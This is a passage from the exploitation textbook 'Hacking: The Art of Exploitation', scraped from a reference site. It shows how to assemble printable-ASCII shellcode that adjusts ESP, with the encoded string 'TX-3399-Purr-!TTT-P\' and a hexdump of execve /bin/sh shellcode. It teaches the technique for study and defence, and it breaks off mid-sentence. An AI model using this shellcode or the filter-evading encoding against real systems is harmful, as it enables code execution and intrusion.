COUNTERMEASURES - Hacking: The Art of Exploitation

Graphics Programs Reference

In-Depth Information

reader@hacking:~/booksrc $ gdb -q

(gdb) print 0 - 0x39393333 - 0x72727550 - 0x54545421

$1 = 860

(gdb)

The goal is to subtract these values from ESP, not EAX, but the instruction

sub esp doesn't assemble into a printable ASCII character. So the current value

of ESP must be moved into EAX for the subtraction, and then the new value of

EAX must be moved back into ESP.

However, since neither mov esp, eax nor mov eax, esp assemble into

printable ASCII characters, this exchange must be done using the stack. By

pushing the value from the source register to the stack and then popping it

off into the destination register, the equivalent of a mov dest, source instruction

can be accomplished with push source and pop dest . Fortunately, the pop and

push instructions for both EAX and ESP registers assemble into printable ASCII

characters, so this can all be done using printable ASCII.

Here is the final set of instructions to add 860 to ESP.

push esp ; Assembles into T

pop eax ; Assembles into X

sub eax, 0x39393333 ; Assembles into -3399

sub eax, 0x72727550 ; Assembles into -Purr

sub eax, 0x54545421 ; Assembles into -!TTT

push eax ; Assembles into P

p op esp ; Assembles into \

This means that TX-3399-Purr-!TTT-P\ will add 860 to ESP in machine

code. So far, so good. Now the shellcode must be built.

First, EAX must be zeroed out; this is easy now that a method has been

discovered. Then, by using more sub instructions, the EAX register must be

set to the last four bytes of the shellcode, in reverse order. Since the stack

normally grows upward (toward lower memory addresses) and builds with a

FILO ordering, the first value pushed to the stack must be the last four bytes

of the shellcode. These bytes must be in reverse order, due to the little-endian

byte ordering. The following output shows a hexadecimal dump of the stan-

dard shellcode used in the previous chapters, which will be built by the print-

able loader code.

reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin

00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|

00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|

0 0000020 e1 cd 80 |...|

In this case, the last four bytes are shown in bold; the proper value for

the EAX register is 0x80cde189 . This is easy to do by using sub instructions to

wrap the value around. Then, EAX can be pushed to the stack. This moves

Search WWH ::

Custom Search

Home